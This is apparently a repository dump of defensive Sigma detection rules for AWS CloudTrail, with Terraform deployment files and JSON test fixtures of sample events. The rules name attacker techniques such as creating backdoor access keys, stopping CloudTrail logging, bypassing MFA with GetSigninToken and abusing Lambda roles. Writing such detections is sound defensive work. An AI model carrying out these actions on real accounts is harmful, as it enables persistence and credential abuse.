5 | references: 6 | - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html 7 | - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html 8 | author: Austin Songer 9 | date: 2021-09-22 10 | modified: 2022-12-18 11 | tags: 12 | - attack.initial-access 13 | - attack.t1078 14 | - attack.lateral-movement 15 | - attack.t1548 16 | - attack.privilege-escalation 17 | - attack.t1550 18 | - attack.t1550.001 19 | logsource: 20 | product: aws 21 | service: cloudtrail 22 | detection: 23 | selection_sts: 24 | eventSource: 'sts.amazonaws.com' 25 | eventName: 'AssumeRoleWithSAML' 26 | selection_iam: 27 | eventSource: 'iam.amazonaws.com' 28 | eventName: 'UpdateSAMLProvider' 29 | condition: 1 of selection_* 30 | falsepositives: 31 | - Automated processes that use Terraform may lead to false positives. Because the condition matches every AssumeRoleWithSAML event, routine federated sign-ins will also trigger this rule unless it is tuned for your environment. 32 | - The SAML provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 33 | - A SAML provider being updated by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_lock_disabled.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Domain Transfer Lock Disabled 2 | id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 3 | status: test 4 | description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. 
5 | references: 6 | - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml 7 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html 8 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html 9 | author: Elastic, Austin Songer @austinsonger 10 | date: 2021-07-22 11 | modified: 2022-10-09 12 | tags: 13 | - attack.persistence 14 | - attack.credential-access 15 | - attack.t1098 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: route53.amazonaws.com 22 | eventName: DisableDomainTransferLock 23 | condition: selection 24 | falsepositives: 25 | - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_console_getsignintoken.yml: -------------------------------------------------------------------------------- 1 | title: AWS Console GetSigninToken Potential Abuse 2 | id: f8103686-e3e8-46f3-be72-65f7fcb4aa53 3 | status: test 4 | description: | 5 | Detects potentially suspicious events involving "GetSigninToken". 6 | An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request. 
7 | references: 8 | - https://github.com/NetSPI/aws_consoler 9 | - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ 10 | author: Chester Le Bron (@123Le_Bron) 11 | date: 2024-02-26 12 | modified: 2025-04-12 # Modified by adanalvarez 13 | tags: 14 | - attack.lateral-movement 15 | - attack.t1021.007 16 | - attack.t1550.001 17 | logsource: 18 | product: aws 19 | service: cloudtrail 20 | detection: 21 | selection: 22 | eventSource: 'signin.amazonaws.com' 23 | eventName: 'GetSigninToken' 24 | filter_main_console_ua: 25 | userAgent|contains: 'Jersey' 26 | condition: selection and not filter_main_console_ua 27 | falsepositives: 28 | - GetSigninToken events occur when users log in through the AWS SSO portal and will generate false positives unless the expected user agent(s) are filtered out, see filter. Because the user agent is supplied by the client, the filter reduces noise rather than acting as a hard boundary; GetSigninToken calls from non-SSO-configured roles are abnormal and should be investigated. 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_lambda_function_url.yml: -------------------------------------------------------------------------------- 1 | title: New AWS Lambda Function URL Configuration Created 2 | id: ec541962-c05a-4420-b9ea-84de072d18f4 3 | status: experimental 4 | description: | 5 | Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. 6 | This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function. 
7 | references: 8 | - https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html 9 | - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc 10 | - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws 11 | author: Ivan Saakov 12 | date: 2024-12-19 13 | tags: 14 | - attack.initial-access 15 | - attack.privilege-escalation 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: lambda.amazonaws.com 22 | eventName: 'CreateFunctionUrlConfig' 23 | condition: selection 24 | falsepositives: 25 | - Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 27 | level: medium 28 | -------------------------------------------------------------------------------- /terraform/main.tf: -------------------------------------------------------------------------------- 1 | ############################ 2 | # PROVIDER & DATA 3 | ############################ 4 | provider "aws" { 5 | region = var.aws_region 6 | default_tags { 7 | tags = { 8 | Environment = var.environment 9 | Service = "TrailAlerts" 10 | ManagedBy = "Terraform" 11 | } 12 | } 13 | } 14 | 15 | terraform { 16 | required_providers { 17 | aws = { 18 | source = "hashicorp/aws" 19 | version = "~> 6.0" 20 | } 21 | } 22 | 23 | #backend "s3" { 24 | # bucket = "trailalerts-terraform-state-123123123123" # Change this to your S3 bucket name 25 | # key = "terraform.tfstate" 26 | # region = "us-east-1" 27 | # encrypt = true 28 | #} 29 | } 30 | 31 | module "trailalerts" { 32 | source = "adanalvarez/trailalerts/aws" 33 | version = "0.2.1" 34 | 35 | aws_region = var.aws_region 36 | environment = 
var.environment 37 | email_endpoint = var.email_endpoint 38 | create_cloudtrail = var.create_cloudtrail 39 | existing_cloudtrail_bucket_name = var.existing_cloudtrail_bucket_name 40 | enable_sns = var.enable_sns 41 | ses_identities = var.ses_identities 42 | source_email = var.source_email 43 | vpnapi_key = var.vpnapi_key 44 | correlation_enabled = var.correlation_enabled 45 | cloudwatch_logs_retention_days = var.cloudwatch_logs_retention_days 46 | notification_cooldown_minutes = var.notification_cooldown_minutes 47 | min_notification_severity = var.min_notification_severity 48 | project = var.project 49 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_data_management_tampering.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Data Management Tampering 2 | id: 78b3756a-7804-4ef7-8555-7b9024a02e2d 3 | status: test 4 | description: Detects when a user tampers with S3 data management in Amazon Web Services. 
5 | references: 6 | - https://github.com/elastic/detection-rules/pull/1145/files 7 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html 8 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html 9 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html 10 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html 11 | - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html 12 | - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html 13 | author: Austin Songer @austinsonger 14 | date: 2021-07-24 15 | modified: 2022-10-09 16 | tags: 17 | - attack.exfiltration 18 | - attack.t1537 19 | logsource: 20 | product: aws 21 | service: cloudtrail 22 | detection: 23 | selection: 24 | eventSource: s3.amazonaws.com 25 | eventName: 26 | - PutBucketLogging 27 | - PutBucketWebsite 28 | - PutEncryptionConfiguration 29 | - PutLifecycleConfiguration 30 | - PutReplicationConfiguration 31 | - ReplicateObject 32 | - RestoreObject 33 | condition: selection 34 | falsepositives: 35 | - An S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration changes from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
36 | level: low 37 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_update_login_profile_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDA123456789EXAMPLE", 8 | "arn": "arn:aws:iam::123456789012:user/admin", 9 | "accountId": "123456789012", 10 | "accessKeyId": "AKIA123456789EXAMPLE", 11 | "userName": "admin" 12 | }, 13 | "eventTime": "2025-04-12T16:25:48Z", 14 | "eventSource": "iam.amazonaws.com", 15 | "eventName": "UpdateLoginProfile", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "192.0.2.1", 18 | "userAgent": "aws-cli/2.9.19", 19 | "requestParameters": { 20 | "userName": "victim", 21 | "password": "********", 22 | "passwordResetRequired": false 23 | }, 24 | "responseElements": null, 25 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 26 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 27 | "readOnly": false, 28 | "eventType": "AwsApiCall", 29 | "managementEvent": true, 30 | "recipientAccountId": "123456789012", 31 | "eventCategory": "Management" 32 | } 33 | ], 34 | "should_not_match": [ 35 | { 36 | "eventVersion": "1.09", 37 | "userIdentity": { 38 | "type": "IAMUser", 39 | "principalId": "AIDA123456789EXAMPLE", 40 | "arn": "arn:aws:iam::123456789012:user/user1", 41 | "accountId": "123456789012", 42 | "accessKeyId": "AKIA123456789EXAMPLE", 43 | "userName": "user1" 44 | }, 45 | "eventTime": "2025-04-12T16:28:32Z", 46 | "eventSource": "iam.amazonaws.com", 47 | "eventName": "UpdateLoginProfile", 48 | "awsRegion": "us-east-1", 49 | "sourceIPAddress": "192.0.2.1", 50 | "userAgent": "aws-cli/2.9.19", 51 | "requestParameters": { 52 | "userName": "user1", 53 | "password": "********", 54 | "passwordResetRequired": false 55 | }, 56 | "responseElements": null, 57 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 58 | "eventID": 
"2a9c402c-5df4-4e68-a21f-EXAMPLE", 59 | "readOnly": false, 60 | "eventType": "AwsApiCall", 61 | "managementEvent": true, 62 | "recipientAccountId": "123456789012", 63 | "eventCategory": "Management" 64 | } 65 | ] 66 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_backdoor_users_keys_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDAJ45QHBFG76EXAMPLE", 8 | "arn": "arn:aws:iam::123456789012:user/alice", 9 | "accountId": "123456789012", 10 | "accessKeyId": "AKIAIOSFODNN7EXAMPLE", 11 | "userName": "alice" 12 | }, 13 | "eventTime": "2025-04-12T14:21:36Z", 14 | "eventSource": "iam.amazonaws.com", 15 | "eventName": "CreateAccessKey", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "192.0.2.1", 18 | "userAgent": "aws-cli/2.17.12 Python/3.11.6 Linux/5.15.0-100-generic exe/x86_64.ubuntu.22", 19 | "requestParameters": { 20 | "userName": "bob" 21 | }, 22 | "responseElements": { 23 | "accessKey": { 24 | "userName": "bob", 25 | "status": "Active", 26 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 27 | "createDate": "2025-04-12T14:21:36Z" 28 | } 29 | }, 30 | "requestID": "9c23c774-e2b5-46fe-83b9-EXAMPLE", 31 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 32 | "readOnly": false, 33 | "eventType": "AwsApiCall", 34 | "managementEvent": true, 35 | "recipientAccountId": "123456789012", 36 | "eventCategory": "Management" 37 | } 38 | ], 39 | "should_not_match": [ 40 | { 41 | "eventVersion": "1.09", 42 | "userIdentity": { 43 | "type": "IAMUser", 44 | "principalId": "AIDAJKF7WHFFX3EXAMPLE", 45 | "arn": "arn:aws:iam::123456789012:user/bob", 46 | "accountId": "123456789012", 47 | "accessKeyId": "AKIAIOSFODNN7EXAMPLE", 48 | "userName": "bob" 49 | }, 50 | "eventTime": "2025-04-12T15:10:22Z", 51 | "eventSource": "iam.amazonaws.com", 52 | "eventName": 
"CreateAccessKey", 53 | "awsRegion": "us-east-1", 54 | "sourceIPAddress": "192.0.2.3", 55 | "userAgent": "aws-cli/2.17.12 Python/3.11.6 Linux/5.15.0-100-generic exe/x86_64.ubuntu.22", 56 | "requestParameters": { 57 | "userName": "bob" 58 | }, 59 | "responseElements": { 60 | "accessKey": { 61 | "userName": "bob", 62 | "status": "Active", 63 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 64 | "createDate": "2025-04-12T15:10:22Z" 65 | } 66 | }, 67 | "requestID": "7a23d884-e5c5-46fe-83b9-EXAMPLE", 68 | "eventID": "8b9c402c-7ef4-4e68-a21f-EXAMPLE", 69 | "readOnly": false, 70 | "eventType": "AwsApiCall", 71 | "managementEvent": true, 72 | "recipientAccountId": "123456789012", 73 | "eventCategory": "Management" 74 | } 75 | ] 76 | } -------------------------------------------------------------------------------- /terraform/variables.tf: -------------------------------------------------------------------------------- 1 | variable "aws_region" { 2 | description = "The AWS region where all resources will be deployed" 3 | type = string 4 | } 5 | 6 | variable "email_endpoint" { 7 | description = "Email address that will receive security notifications and alerts" 8 | type = string 9 | } 10 | 11 | variable "create_cloudtrail" { 12 | description = "Whether to create CloudTrail and S3 bucket or use existing" 13 | type = bool 14 | default = true 15 | } 16 | 17 | variable "existing_cloudtrail_bucket_name" { 18 | description = "Name of existing CloudTrail bucket when create_cloudtrail is false" 19 | type = string 20 | default = "" 21 | } 22 | 23 | variable "enable_sns" { 24 | description = "Whether to create SNS topic and subscription" 25 | type = bool 26 | default = true 27 | } 28 | 29 | variable "ses_identities" { 30 | description = "List of SES identities to verify and use for email notifications" 31 | type = list(string) 32 | default = [] 33 | } 34 | variable "source_email" { 35 | description = "Email address to use as the source for email notifications" 36 | type = string 37 | default 
= "" 38 | } 39 | variable "vpnapi_key" { 40 | description = "API key for VPN service integration" 41 | type = string 42 | default = "" 43 | } 44 | 45 | variable "correlation_enabled" { 46 | type = bool 47 | default = false 48 | description = "Whether to enable event correlation analysis - creates a DynamoDB table for storing and analyzing security events" 49 | } 50 | 51 | variable "environment" { 52 | description = "Deployment environment identifier (e.g., dev, prod, staging) for resource tagging and isolation" 53 | type = string 54 | default = "dev" 55 | } 56 | 57 | variable "cloudwatch_logs_retention_days" { 58 | description = "Number of days to retain CloudWatch logs before automatic deletion" 59 | type = number 60 | default = 30 61 | } 62 | 63 | variable "notification_cooldown_minutes" { 64 | description = "Cooldown period in minutes between notifications for the same rule to prevent alert fatigue" 65 | type = number 66 | default = 60 67 | } 68 | 69 | variable "min_notification_severity" { 70 | description = "Minimum severity threshold for sending notifications (critical, high, medium, low, info)" 71 | type = string 72 | default = "medium" 73 | validation { 74 | condition = contains(["critical", "high", "medium", "low", "info"], var.min_notification_severity) 75 | error_message = "The min_notification_severity value must be one of: critical, high, medium, low, info." 
76 | } 77 | } 78 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_enum_buckets_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "ListBuckets", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | 
"creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "getObject", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_create_iam_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "CreateUser", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": 
true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateUser", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_identity_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | 
"accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ses.amazonaws.com", 27 | "eventName": "DeleteIdentity", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteIdentity", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } 
-------------------------------------------------------------------------------- /rules/sigma_rules/aws_ssm_ssmgetparameter_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ssm.amazonaws.com", 27 | "eventName": "GetParameter", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | 
"creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetParameter", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_disable_logging_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "cloudtrail.amazonaws.com", 27 | "eventName": "StopLogging", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | 
"managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "StopLogging", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_route_added_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 